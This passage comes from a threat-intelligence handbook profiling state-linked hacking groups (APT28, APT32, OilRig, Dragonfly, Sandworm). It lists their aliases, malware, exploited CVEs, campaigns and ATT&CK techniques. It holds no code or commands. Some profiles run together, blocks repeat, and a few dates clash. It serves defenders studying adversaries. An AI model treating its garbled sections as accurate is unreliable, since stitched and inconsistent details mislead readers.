Malwares: BADVSTORESHELL, Cannon, CORESHELL, DealersChoice, Downdelph, HIDEDRV, JHUHUGIT, Komplex, LoJax, OLDBAIT, USBStealer, X-Agent, XAgentOSX, X-Agent for Android, XTunnel, Zebrocy
Legitimate software: Certutil, Forfiles, Koadic, Mimikatz, Responder, Winexe
Exploited vulnerabilities: CVE-2017-0144, CVE-2014-1776, CVE-2014-1761, CVE-2012-0158, CVE-2015-5119, CVE-2013-3906, CVE-2015-7645, CVE-2015-2387, CVE-2010-3333, CVE-2015-1641, CVE-2013-1347, CVE-2013-3897, CVE-2015-3043, CVE-2015-2424, CVE-2015-1642, CVE-2015-2590, CVE-2015-1701, CVE-2015-4902, CVE-2017-0262, CVE-2017-0263, CVE-2014-4076, CVE-2014-0515

[Timeline figure, 2008-2014: Jan-2008, cyber-attacks accompanying Georgian invasion; Jan-2008, compromise of the US Department of Defense network; Jan-2011, APT28 use lure written in Georgian; Oct-2011, spearphishing on the French Defense Ministry; Jan-2012, spearphishing on the Vatican embassy in Iraq; Jan-2013, targeting the Georgian Ministry of Internal Affairs; Jul-2013, targeting an Eastern European Ministry of Foreign Affairs; Sep-2013, spearphishing on military officials; Jan-2014, spearphishing on Pakistani military officials; APT28 uses Android X-Agent to track Ukrainian artillery.]

Targeted Countries _: Afghanistan, Armenia, Belarus, Belgium, Brazil, Bulgaria, Canada, China, France, Georgia, Germany, Hungary, Iran, Japan, Kazakhstan, Latvia, Malaysia, Mongolia, Montenegro, Netherlands, Poland, Romania, Slovakia, South America, South Korea, Spain, Sweden, Switzerland, Tajikistan, Turkey, Ukraine, United Kingdom, United States

CAMPAIGNS
2008 - Compromise of the US Department of Defense network

2008 - Cyber-attacks accompanying Georgian invasion

2011 - APT28 uses lure written in Georgian

October 2011 - Spearphishing of the French Defense Ministry

January 2012 - Spearphishing on the Vatican embassy in Iraq

Mid-2013 - Targeting the Georgian Ministry of Internal Affairs

September 2013 - Spearphishing on military officials

Late-2013 - Targeting a journalist covering the Caucasus

Late-2013 - Targeting an Eastern European Ministry of Foreign Affairs

January 2014 - Spearphishing on Pakistani military officials

August 2014 - Attempt to compromise the Polish government
APT28 used a lure about hostilities surrounding a Malaysia Airlines flight downed in Ukraine in a probable attempt to compromise the Polish government.

September 2014 - Typosquatting of European defense exhibition
In September 2014, APT28 registered a domain (smigroup-online.co[.]uk) that appeared to mimic that of the SMi Group, a company that plans events for the "Defence, Security, Energy, Utilities, Finance and Pharmaceutical sectors." Among other events, the SMi Group was at the time planning a military satellite communications event for November 2014.

October 2014 - September 2015 - Operation PawnStorm
Operation Pawn Storm is an economic and political cyber-espionage operation that targets a wide range of entities, like the military, governments, defense industries, and the media. During this operation, APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs.

2014 - 2016 - APT28 uses Android X-Agent to track Ukrainian artillery
Operators of the Ukrainian D-30 artillery used an Android application to simplify targeting. This application was compromised using an Android version of X-Agent. The malware does not interfere with the function of the application, but it was able to gather intelligence about the team and their hierarchy and to get an approximate position.

February - April 2015 - APT28 compromised TV5Monde
On April 8, 2015 at 8:50 p.m. CET, TV5 Monde's broadcasting infrastructure was the target of a cyber-attack. The channel's Twitter and Facebook accounts were also hacked. Messages of support for the Islamic State in English, Arabic and French were published, as well as documents presented as identity documents and CVs of relatives of French military personnel involved in operations against the Islamic State. In June, the media revealed that the investigation was moving away from the jihadist trail, seen as a decoy, and towards that of APT28. The cyber-attack has similarities to the group's modus operandi, uses common servers, and the source code would have been typed on a Cyrillic keyboard at times corresponding to office hours in St Petersburg and Moscow.

April 2015 - Operation RussianDoll
The target firm is an "international government entity" in an industry which APT28 is known to have targeted in the past, said FireEye. The attack also uses a malware variant that shares characteristics with APT28 backdoors.

April - May 2015 - Attack on the German Parliament
During this operation, the attacker did not try to hide their tracks or to maintain access to the compromised environment, as would be seen in a long-term operation. This operation seemed to be opportunistic and quickly executed to exfiltrate as much data as possible.

May 2015 - APT28 targets the Ukrainian Central Election Commission

Summer 2015 - Sofacy attack waves
These attacks targeted NATO, the Afghan Ministry of Foreign Affairs and the Pakistani military.

August 2015 - APT28 targets Russian rockers and dissidents Pussy Riot
APT28 targeted the Russian rockers and dissidents Pussy Riot via spear-phishing emails.

March 2016 - APT28 targets Hillary Clinton presidential campaign
In March 2016, APT28 launched a spearphishing campaign using Bitly accounts to shorten malicious URLs. The targets were similar to previous campaigns but also included email accounts linked to the November 2016 United States presidential election, such as people managing Hillary Clinton's communications, travel, campaign finance, etc.

April - May 2016 - APT28 targets Germany's Christian Democratic Union

May 2016 - Spear-phishing attack against a U.S. government entity
In May 2016, APT28 sent a spear-phishing email to a U.S. government entity using an email address belonging to the Ministry of Foreign Affairs of another country.

Spring 2016 - APT28 attacks the U.S. Democratic National Committee

Summer 2016 - APT28 attacks the World Anti-Doping Agency (WADA)

November 2016 - APT28 targets the Organization for Security and Co-operation in Europe (OSCE)

July 2017 - APT28 targets the hospitality sector in Europe and the Middle East

October 2017 - Spearphishing using a new lure document about the Cyber Conflict U.S. conference

February - October 2018 - APT28 attacks various Ministries of Foreign Affairs around the world
PaloAlto detected three waves of attacks in February, March and June 2018 targeting government organizations dealing with foreign affairs in different geopolitical regions. This operation continued with another wave in October.

[Timeline figure, 2015-2020: Aug-2014, attempt to compromise the Polish government; Sep-2014, typosquatting of European defense exhibition; Oct-2014, Operation PawnStorm; Jan-2015, Sofacy attack waves; Feb-2015, APT28 compromised TV5Monde; Apr-2015, Operation RussianDoll, attack on the German Parliament; May-2015, APT28 targets the Ukrainian Central Election Commission; Aug-2015, APT28 targets Russian rockers and dissidents Pussy Riot; Jan-2016, APT28 attacks the World Anti-Doping Agency (WADA), APT28 attacks the U.S. Democratic National Committee; Mar-2016, APT28 targets Hillary Clinton presidential campaign; Apr-2016, APT28 targets Germany's Christian Democratic Union; May-2016, spear-phishing attack against a U.S. government entity; Nov-2016, APT28 targets the Organization for Security and Co-operation in Europe (OSCE); Jul-2017, APT28 targets the hospitality sector in Europe and Middle East; Sep-2017, spearphishing using a new lure document about the Cyber Conflict U.S. conference; Feb-2018, APT28 attacks various Ministries of Foreign Affairs around the world; Jul-2019, targeting journalist covering the Caucasus.]

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1091 - Replication Through Removable Media
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment
T1199 - Trusted Relationship

Execution
T1059 - Command-Line Interface
T1064 - Scripting
T1085 - Rundll32
T1086 - PowerShell
T1173 - Dynamic Data Exchange
T1203 - Exploitation for Client Execution
T1204 - User Execution

Persistence
T1037 - Logon Scripts
T1067 - Bootkit
T1078 - Valid Accounts
T1122 - Component Object Model Hijacking
T1137 - Office Application Startup
T1158 - Hidden Files and Directories

Privilege Escalation
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts
T1134 - Access Token Manipulation

Defense Evasion
T1014 - Rootkit
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1070 - Indicator Removal on Host
T1078 - Valid Accounts
T1085 - Rundll32
T1099 - Timestomp
T1107 - File Deletion
T1122 - Component Object Model Hijacking
T1134 - Access Token Manipulation
T1158 - Hidden Files and Directories
T1221 - Template Injection
T1140 - Deobfuscate/Decode Files or Information
T1211 - Exploitation for Defense Evasion

Credential Access
T1003 - Credential Dumping
T1040 - Network Sniffing
T1056 - Input Capture

Discovery
T1040 - Network Sniffing
T1057 - Process Discovery
T1083 - File and Directory Discovery
T1120 - Peripheral Device Discovery

Lateral Movement
T1037 - Logon Scripts
T1075 - Pass the Hash
T1091 - Replication Through Removable Media
T1105 - Remote File Copy
T1210 - Exploitation of Remote Services

Collection
T1005 - Data from Local System
T1025 - Data from Removable Media
T1056 - Input Capture
T1074 - Data Staged
T1113 - Screen Capture
T1114 - Email Collection
T1119 - Automated Collection
T1213 - Data from Information Repositories

Command and Control
T1001 - Data Obfuscation
T1024 - Custom Cryptographic Protocol
T1071 - Standard Application Layer Protocol
T1090 - Connection Proxy
T1092 - Communication Through Removable Media
T1105 - Remote File Copy

Exfiltration
T1002 - Data Compressed

Alias _: APT-C-00, APT32, ATK17 (77), COBALT KITTY, OCEAN BUFFALO, OCEAN LOTUS, SEALOTUS, SECTORF01
Threat Actor _: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _: Administration, Communication, Financial Services, Government Agencies, High-Tech, International Organizations, Legal Services, Manufacturing, Media, Military, Naval, Research
Motivations & Objectives _: Espionage
Language: Unknown
Assumed origin of the attacker: Viet Nam

DESCRIPTION
ATK17 is a Vietnamese group that runs a nearly continuous espionage campaign against various but well-defined targets, while maintaining a developed arsenal of tools. This group is known for the diversity of the lures that it uses in order to target its victims. It is an active group, with diverse tools on multiple platforms (Windows and MacOS). It is highly adaptable even when discovered and has used multiple CVEs in order to reach its goals.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: Custom ATK17 netcat, Denis, Goopy, Horsum, KOMPROGO, MacOS Trojan, PHOREAL, Rastls, ROLAND, Rizzo, SOUNDBITE, Unnamed Outlook Backdoor, WINDSHIELD
Legitimate software: CamCapture Plugin, Cobalt Strike, Customized Windows Credentials Dumper, Customized Outlook Credentials Dumper, Custom IP check tool, Don't-Kill-My-Cat, GetPassword_x64, HookPasswordChange, KerrDown, Mimikatz, PowerShell, Microsoft scripting tool, Remy, Splinter
Exploited vulnerabilities: CVE-2017-0144, CVE-2017-11882, CVE-2016-7255, CVE-2018-20250

Targeted Countries _: Australia, China, Germany, Philippines, Southeast Asia, United States, Vietnam

CAMPAIGNS
2010 - First mention of APT32
The first mention of a Vietnamese attacker group dates from a Google report from 2010. At that time, the group deployed a relatively simple malware embedded in Vietnamese keyboard software. This malware was used to conduct denial of service attacks against blogs belonging to activists, as well as espionage on them.

Evolution of the group to an Advanced Persistent Threat (APT) group.
By the end of 2013, the group used a whole new set of tools to spy on EFF staffers and Associated Press reporters. This toolset was used exclusively for espionage, and the DDoS capabilities that were present in previous iterations are no longer present.

Widening of APT32's scope.
Between 2014 and 2017, the group developed its capabilities in two ways. Firstly, its arsenal gained new tools, dubbed Windshield, Komprogo, Soundbite, Denis, Phoreal and an unnamed Outlook backdoor. Secondly, the group changed the scope and the target distribution of its victims: while continuing its attacks on political dissidents, it also attacked private corporations interested in manufacturing, IT and network security, a new sector of interest. These attacks were domestic but also international.

New techniques for selecting APT32 victims.
In late 2016 - early 2017, the group started massively using watering hole attacks, compromising many websites in order to attract persons of interest for possible compromise. The sheer number of websites that have been compromised (more than a hundred) shows that this threat actor is targeting a vast number of sectors.
At the time the campaign was discovered, we notably found:
• Various domains related to the ASEAN,
• The Ministry of Foreign Affairs, Environment, Civil Service, National Assembly - Senate Relations and Inspection, Social Affairs, Veterans, and Youth Rehabilitation as well as the National Election Committee and the National Police of Cambodia,
• Various Chinese private companies,
• A province website in Laos, as well as the Ministry of Public Works and Transport,
• The Army and Office of the President of the Philippines.
In November 2018, a new wave of compromised websites was discovered, containing, among others:
• Multiple media websites and blogs in Vietnamese,
• Vietnamese websites about religion,
• Various ministries in Cambodia,
• A golf club in Phnom-Penh,
• The websites of the Former Vietnamese Prisoners of Conscience,
• A Cambodian newspaper.

APT32 changes its delivery method.
In 2018, the group was seen using new methods in order to deliver its malwares:

Massive campaign in the Indochinese Peninsula
Since 2018, the group has developed a new loader, KerrDown, probably from scratch. Using the EternalBlue vulnerability, it compromised a Vietnamese company that provides software to the government. It also launched a vast campaign in the Indochinese Peninsula, targeting the following entities:
• A Vietnamese real estate developer,
• The national bank of Vietnam,
• A Vietnamese company that provides software to the government,
• A Vietnamese IT company,
• The Cambodian youth federation,
• The ASEAN, in Thailand, probably in anticipation of the 34th ASEAN Meeting in Bangkok, Thailand, in June 2019.

[Timeline figure, 2014-2018: 2014, Germany, manufacturing; 2014, Southeast Asia, dissidents in the Vietnamese diaspora; 2014, Vietnam, network security; 2015, China; 2015, Vietnam, media; 2016, Vietnam and Philippines, consumer products; 2016, Philippines, IT; 2016, USA, consumer products; 2016, Vietnam, banking; 2016, Vietnam, media; 2017, Australia, dissidents in the Vietnamese diaspora; 2017, Philippines, government employees; 2018.]

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1133 - External Remote Services
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1204 - User Execution
T1223 - Compiled HTML File

Persistence
T1053 - Scheduled Task
T1078 - Valid Accounts
T1100 - Web Shell
T1108 - Redundant Access
T1133 - External Remote Services

Privilege Escalation
T1053 - Scheduled Task
T1078 - Valid Accounts
T1100 - Web Shell

Defense Evasion
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1066 - Indicator Removal from Tools
T1078 - Valid Accounts
T1107 - File Deletion
T1108 - Redundant Access
T1140 - Deobfuscate/Decode Files or Information
T1223 - Compiled HTML File

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture
T1110 - Brute Force

Discovery
T1007 - System Service Discovery
T1012 - Query Registry
T1016 - System Network Configuration Discovery
T1033 - System Owner/User Discovery
T1046 - Network Service Scanning
T1049 - System Network Connections Discovery
T1057 - Process Discovery
T1069 - Permission Groups Discovery
T1082 - System Information Discovery
T1087 - Account Discovery
T1201 - Password Policy Discovery

Lateral Movement
T1021 - Remote Services
T1076 - Remote Desktop Protocol
T1105 - Remote File Copy

Collection
T1056 - Input Capture
T1113 - Screen Capture
T1119 - Automated Collection

Command and Control
T1008 - Fallback Channels
T1032 - Standard Cryptographic Protocol
T1071 - Standard Application Layer Protocol
T1094 - Custom Command and Control Protocol
T1105 - Remote File Copy

Exfiltration
T1048 - Exfiltration Over Alternative Protocol

Alias _: APT34, ATK40 (79), ATK58, CLAYSLIDE, CRAMBUS, HELIX KITTEN, HELMINTH, IRN2, OILRIG, TWISTED KITTEN
Threat Actor _: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown
Targeted Sectors _: Aviation, Education, Energy, Financial Service, Government Agencies, High-Tech, Hospitality
Motivations & Objectives _: Cyber Espionage
Language: Unknown
Assumed origin of the attacker: Iran

DESCRIPTION
ATK40 (OilRig, APT34) is an Iranian cyberespionage threat actor active since at least 2014, primarily operating in the Middle East region. The group targets as a priority the financial institutions of the Sunni Gulf States, but also the United States and Israel, traditional geopolitical opponents of the Republic of the Mullahs. During the OilRig campaign in 2016 against financial institutions in Saudi Arabia, the group demonstrated the capability to adapt its procedures and to use multiple delivery methods, particularly through well-crafted spear-phishing messages relevant to the interests of targeted personnel and custom PowerShell implants like the Helminth backdoor. It relies heavily on the human factor for initial access. After the first reports by FireEye and PaloAlto, the group has been actively updating its tools and expanding its scope of targets (Qatar, Turkey, Israel and United States). The group continues to use communication through DNS tunnelling to the command and control server to stay under the radar. In early 2017, the group demonstrated the ability to use digitally signed malware spread through fake websites (a University of Oxford conference sign-up page and a job application website). PaloAlto observed an overlap between a C&C IP address used by OilRig and one used by Chafer for its Remexi backdoor C&C, suggesting that these groups are one entity or that they share resources. Furthermore, the similarity between the malware ISMAgent used by OilRig and ISMDoor used by GreenBug (ATK59) suggests a link between these groups.

This actor shows a high capacity for adaptation, creating new custom delivery documents and backdoors and using multiple TTPs to re-infect previous targets who took actions to counter their known TTPs. We did not observe this actor using a zero-day exploit, but it quickly used CVE-2017-0199 and CVE-2017-11882, which are widely used, to improve the quality of its lure documents.

Dragos considers that ATK40 (OilRig) and ATK59 (Greenbug) are the same threat group and carried out initial preparations and network intrusion in advance of the Shamoon event. This group regularly tests its samples on anti-virus testers like VirusTotal to determine which parts of their malware are detected. This technique helped to build nearly undetected samples but allowed researchers to follow the modifications. In April 2019, multiple OilRig tools were leaked on a GitHub repository, including BONDUPDATER, the TwoFace WebShell and webmask, a tool linked to DNSpionage. This leak was followed in June 2019 by another about the tool Jason.

OilRig infrastructure is continuously growing but overlaps with previously used infrastructure. The group reuses its tools, uses the same attack protocols and has a consistent victimology, which makes it easy to track down.

TOOLS, MALWARES AND VULNERABILITIES

Malwares: ALMA Communicator, BONDUPDATER, CANDYKING, Clayslide, GOLDIRONY, Helminth, Jason, KEYPUNCH, ISMAgent, ISMInjector, OopsIE, POWBAT, POWRUNER, QUADAGENT, RGDoor, SEASHARPEE, ThreeDollars
Legitimate software: ConfuserEx, Invoke-Obfuscation, Mimikatz, Net, netstat, PsExec, Plink, Reg, SmartAssembly .NET obfuscator, SoftPerfect Network Scanner, Tasklist
Exploited vulnerabilities: CVE-2017-11882, CVE-2017-0199

Targeted Countries _: Azerbaijan, Israel, Kuwait, Lebanon, Mauritius, Qatar, Saudi Arabia, Turkey, United States, United Arab Emirates

CAMPAIGNS
2015 - October 2016 - Wave of emails containing malicious attachments being sent to multiple organizations in the Middle East
In the first week of May 2016, FireEye and PaloAlto identified a wave of emails containing malicious attachments sent to multiple banks and technology organizations in Saudi Arabia. In October 2016, PaloAlto observed the improvement of Clayslide and Helminth. The group started to target organizations in other countries like Qatar and government organizations in Israel, Turkey and the United States.

Late 2016 - OilRig set up a fake VPN Web Portal targeting Israeli organizations
This campaign targeted at least five Israeli IT vendors, several financial institutes and the Israeli Post Office. OilRig also registered domains impersonating the University of Oxford in a fake conference registration website where visitors were asked to download a fake registration tool.

April 2017 - Politically motivated, targeted campaign carried out against numerous Israeli organizations
From April 19 to April 24, 2017, an attack targeting multiple Israeli organizations was delivered through compromised email accounts at Ben-Gurion University. High-tech companies, medical organizations and education organizations were victims of this campaign. Morphisec described this campaign as politically motivated.

July 2017 - Targeted attacks delivering ISMAgent
In July 2017, PaloAlto observed an attack targeting a Middle Eastern technology organization which had already been targeted during the campaign of August 2016. We can suppose that this attack came in support of another operation.

August 2017 - Use of ISMInjector to deliver ISMAgent to an organization within the United Arab Emirates government
In August 2017, PaloAlto discovered a new trojan called ISMInjector developed by OilRig. This malware was used during a campaign targeting an organization in the United Arab Emirates government.

January 2018 - Attack against an insurance agency based in the Middle East using OopsIE and the ThreeDollars delivery document
On January 8, 2018, PaloAlto observed an attack against an insurance agency based in the Middle East, followed by an attack against a financial institution on January 16. The second organization was previously targeted in January 2017.

May - June 2018 - Attack using QUADAGENT
Between May and June 2018, PaloAlto observed OilRig attacks against a government agency in the Middle East. This attack leveraged credential harvesting and a compromised account to use the government agency as a launching platform for other attacks, including one against a technology service provider and one against another government agency.

Summer 2018 - Attacks on Middle East entities
During the summer of 2018, CrowdStrike observed OilRig targeting entities that appeared to be located in Bahrain and Kuwait.

November 2018 - Attack on the Telecommunication sector
In November 2018, CrowdStrike observed OilRig targeting the telecommunication sector. While it used its known TTPs, this activity represented a shift in targeting.

[Timeline figure, 2015-2019: Jun-2015 to Oct-2016, wave of emails containing malicious attachments being sent to multiple organizations in the Middle East; Oct-2016, OilRig set up a fake VPN Web Portal targeting Israeli organizations; Apr-2017, politically motivated, targeted campaign carried out against numerous Israeli organizations; Jul-2017, targeted attacks delivering ISMAgent; Aug-2017, use of ISMInjector to deliver ISMAgent to an organization within the United Arab Emirates government; Jan-2018, attack against an insurance agency based in the Middle East using OopsIE and ThreeDollars delivery document; May-Jun-2018, attack using QUADAGENT; Summer 2018, attacks on Middle East entities; Nov-2018, attack on the Telecommunication sector.]

Alias: APT34, ATK40, ATK58, CLAYSLIDE, CRAMBUS, HELIX KITTEN, HELMINTH, IRN2, OILRIG, TWISTED KITTEN
Score: 79
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: Aviation, Education, Energy, Financial Service, Government Agencies, High-Tech, Hospitality
Motivations & Objectives: Cyber Espionage
Language: Unknown
Targeted Countries: Azerbaijan, Israel, Kuwait, Lebanon, Mauritius, Qatar, Saudi Arabia, Turkey, United Arab Emirates, United States
Assumed origin of the attacker: Iran

28 The Cyberthreat Handbook • Thales - Verint

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1133 - External Remote Services
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1204 - User Execution
T1223 - Compiled HTML File

Persistence
T1053 - Scheduled Task
T1078 - Valid Accounts
T1100 - Web Shell
T1108 - Redundant Access
T1133 - External Remote Services

Privilege Escalation
T1053 - Scheduled Task
T1078 - Valid Accounts
T1100 - Web Shell

Defense Evasion
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1066 - Indicator Removal from Tools
T1078 - Valid Accounts
T1107 - File Deletion
T1108 - Redundant Access
T1140 - Deobfuscate/Decode Files or Information
T1223 - Compiled HTML File

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture
T1110 - Brute Force

Discovery
T1007 - System Service Discovery
T1012 - Query Registry
T1016 - System Network Configuration Discovery
T1033 - System Owner/User Discovery
T1046 - Network Service Scanning
T1049 - System Network Connections Discovery
T1057 - Process Discovery
T1069 - Permission Groups Discovery
T1082 - System Information Discovery
T1087 - Account Discovery
T1201 - Password Policy Discovery

Lateral Movement
T1021 - Remote Services
T1076 - Remote Desktop Protocol
T1105 - Remote File Copy

Collection
T1056 - Input Capture
T1113 - Screen Capture
T1119 - Automated Collection

Command and Control
T1008 - Fallback Channels
T1032 - Standard Cryptographic Protocol
T1071 - Standard Application Layer Protocol
T1094 - Custom Command and Control Protocol
T1105 - Remote File Copy

Exfiltration
T1048 - Exfiltration Over Alternative Protocol
Alias: ATK6, CROUCHING YETI, DRAGONFLY, DYMALLOY, ENERGETIC BEAR, GROUP 24, HAVEX, KOALA TEAM, IRON LIBERTY, TG-4192
Score: 76
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: Aviation, Defence, Energy
Motivations & Objectives: Espionage
Language: Unknown

DESCRIPTION
Dragonfly is a cyber espionage group that has been active since at least 2010. They initially targeted defense and aviation companies but shifted their focus to the energy sector in early 2013. Dragonfly's activities can be separated into three periods:
2010-2013, the beginning of its activities using large spam campaigns;
2013-2014, when it started to target the energy sector using spear-phishing;
2015-2019, a re-launch of its attacks after a break.

International context
It must be remembered that these Dragonfly Group campaigns take place in a complex and turbulent international context. The years 2000-2010 were marked by the acceleration of the European Union's search for alternatives regarding its gas supply sources. Because of its dependence on imported Russian natural gas, the Union is concerned. Between 2010 and 2016, the EU Member States had an average energy dependence rate of 53.44% on the rest of the world according to Eurostat (with wide disparities between countries). This inability to meet its consumption needs alone is strategically uncomfortable, especially since Russia has been supplying more than a third of the imported natural gas since 2010. In 2009, it was therefore decided to diversify the sources of supply by reinvigorating the Nabucco alternative gas pipeline project (from Iran and avoiding Ukraine), which is a direct competitor of the Russian South Stream project.
This competition has shown Russia that the European Union is seeking to get rid of its energy grip. Tension only ceased with the exhaustion of Nabucco, as Russia managed to empty the project's sources of supply by encouraging Azerbaijan to turn to South Stream and Turkmenistan to China (these two countries were the main sources of supply for the project).
At the end of 2013, an Association Agreement was about to be signed between the EU and Ukraine. As a result, Russia put pressure on Ukrainian President Viktor Yanukovych, who decided in November 2013 to abandon the project, triggering the Euromaïdan demonstrations and the Ukrainian crisis. On February 22, 2014, the Ukrainian President was dismissed and replaced by Oleksandr Tourtchynov. Ukraine's political change of course in the context of the crisis prompted Russia to change its pressure strategy by raising the price of gas for the country by 44% on 1 April 2014 (in 2013 it imported half of its consumption from Russia). Three days later, a new increase was decided, for a total increase of 80%.
In response, and after the Crimean war between February and March 2014, the European Union and the United States applied economic sanctions against Russia. These are in addition to the decline in European energy demand, competition with Iran in the gas sector and the global decline in hydrocarbon prices. All these factors led to a contraction in Russian activity between 2015 (-2.8%) and 2016 (-0.2%). Over the entire period covered by Dragonfly's activities, Russia's annual growth rate stagnated at just over 0%. The group's various stages of activity over the period in question, the choice of targets and the modus operandi suggest that there is a concordance of interests with the Russian State. While Dragonfly did not exclusively target the gas sub-sector, its espionage in the energy sector can attest to this convergence.

Targeted Countries: Canada, France, Germany, Greece, Italy, Norway, Poland, Serbia, Spain, Turkey, United Kingdom, United States
Assumed origin of the attacker: Russia

CAMPAIGNS

First campaign against the US and Canada
Dragonfly initially targeted defence and aviation companies in the US and Canada before shifting to US and European energy sector targets in 2013.

Changing targets - attacks on the energy sector
Since 2013 it has targeted energy grid operators, companies related to industrial control systems (ICS), major electricity generation firms, petroleum pipeline operators, energy industry industrial equipment providers and nuclear industries. Dragonfly started to target the energy supply chain by targeting ICS equipment providers in March 2014 with the Havex trojan. It compromised their legitimate software which was available for download on their websites, such as the MESA Imaging driver (from the Swiss company MESA Imaging), eCatcher (from the Belgian company eWon) or multiple software packages from the German company MB Connect Line GmbH.

December 2015 - 2018 - CASTLE campaign
The group re-emerged in December 2015 with a campaign named "CASTLE campaign" by Dell Secureworks. The group initially used spam email campaigns and watering hole attacks to infect targeted organizations. It started to use spear-phishing in February 2013 to deliver malicious PDF attachments, in emails whose topics were related to office administration issues, to selected targets. At this time, it used compromised websites as C2 servers. It appears that its main target was the energy sector and industrial control systems located in Europe, while US victims were collateral damage. After the 2014-2015 quiet period, the group reappeared in what Symantec called Dragonfly 2.0, targeting the energy sector in the US, Turkey and Switzerland.

Timeline
2010-2013 - First campaign against the US and Canada
2013 - Changing targets: attacks on the energy sector
Dec-2015-2018 - CASTLE campaign

TOOLS, MALWARES AND VULNERABILITIES

Malwares
 CrackMapExec
 Dorshel
 Goodor
 IKLG (Keylogger)
 Karagany
 Lightsout exploit kit
 Listrix
 MCMD
 Oldrea
 ScreenUtil

Legitimate software
 Angry IP Scanner
 Inveigh
 Mimikatz
 Phishery
 PsExec

Exploited vulnerabilities
 None
MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1133 - External Remote Services
T1189 - Drive-by Compromise
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1204 - User Execution

Persistence
T1023 - Shortcut Modification
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts
T1098 - Account Manipulation
T1100 - Web Shell
T1133 - External Remote Services
T1136 - Create Account

Privilege Escalation
T1053 - Scheduled Task
T1078 - Valid Accounts
T1100 - Web Shell

Defense Evasion
T1036 - Masquerading
T1064 - Scripting
T1070 - Indicator Removal on Host
T1078 - Valid Accounts
T1089 - Disabling Security Tools
T1107 - File Deletion
T1112 - Modify Registry
T1221 - Template Injection

Credential Access
T1003 - Credential Dumping
T1098 - Account Manipulation
T1110 - Brute Force
T1187 - Forced Authentication

Discovery
T1012 - Query Registry
T1016 - System Network Configuration Discovery
T1018 - Remote System Discovery
T1033 - System Owner/User Discovery
T1069 - Permission Groups Discovery
T1083 - File and Directory Discovery
T1087 - Account Discovery
T1135 - Network Share Discovery

Lateral Movement
T1076 - Remote Desktop Protocol
T1105 - Remote File Copy

Collection
T1005 - Data from Local System
T1074 - Data Staged
T1113 - Screen Capture
T1114 - Email Collection

Command and Control
T1043 - Commonly Used Port
T1071 - Standard Application Layer Protocol
T1105 - Remote File Copy

Exfiltration
T1002 - Data Compressed
Alias: ATK14, BLACK ENERGY, ELECTRUM, GREYENERGY, QUEDAGH, SANDWORM, TELEBOTS, TEMP.NOBLE, VOODOO BEAR
Score: 74
Threat Actor: Cyber Criminal / Cyber Terrorist / Hacktivist / State Sponsored / Unknown (checkbox field; selection not preserved)
Targeted Sectors: Energy
Motivations & Objectives: Cyber Espionage, Sabotage
Language: Unknown

DESCRIPTION
ATK14 is an attacker group of Russian origin, active since at least 2008. This attacker is extremely active and competent and is well known for the BlackEnergy campaign as well as the NotPetya campaign. We think that this adversary is linked to the government.

Origins of the group
BlackEnergy is a malware allegedly created in 2006-2007. It was used to launch DDoS attacks against machines. It was used against Georgia and Estonia in large campaigns, taking down governmental and banking websites. The attacker reportedly sold the source code for $700. Several actors used this malware, continuing DDoS attacks against Georgia. Around 2014, a group created SCADA and ICS plugins for BlackEnergy in order to target manufacturing and the energy sector worldwide. This is the group named ATK14.

TOOLS, MALWARES AND VULNERABILITIES

Malwares
 BCS-Server
 BlackEnergy
 C99shell
 GCat
 GreyEnergy
 Potao
 Telebot
 WSO

Legitimate software
 3proxy
 Dante
 Dropbear SSH
 Mimikatz
 Nmap
 Plink

Exploited vulnerabilities
 CVE-2017-0144
 CVE-2014-1761
 CVE-2010-3333
 CVE-2017-0143
 CVE-2017-0146
 CVE-2017-0147

Targeted Countries: Poland, Russia, Ukraine
Assumed origin of the attacker: Russia

CAMPAIGNS

2011 - 2015 - Operation Potao
Between 2011 and 2013, a malware called Potao was seen targeting Russia, Armenia and Georgia. In late 2013, the malware started shifting its focus towards Ukraine, with several samples targeting this country. Among the victims of the malware are high-prevalence targets, especially since September 2014, including the Ukrainian government and armed forces.

2013 - 2014 - BlackEnergy Lite
By 2013, the BlackEnergy trojan was still active and underwent further development. This led to the creation of new versions, dubbed BlackEnergy2 and BlackEnergy3. Using this family, the group led targeted attack campaigns at approximately the same time as the Potao malware. As for the Potao campaign, a lot of the group's victims were in Ukraine (around 50%, the remaining half located in Poland) and were high-profile targets such as state organizations and businesses.

2015 - Evolution of BlackEnergy/KillDisk
In 2015, the BlackEnergy malware was used in various campaigns that can be identified by the "Build ID" of a sample. While a destructive plugin, dstr, had been introduced in 2014, a new one with the same purpose was deployed in some campaigns: this destroyer, named KillDisk, overwrites the whole disk with random data and makes the OS unbootable. This component was used in November 2015 in an attack against Ukrainian media companies ahead of the 2015 Ukrainian local elections.

December 2015 - Power outage in Ukraine
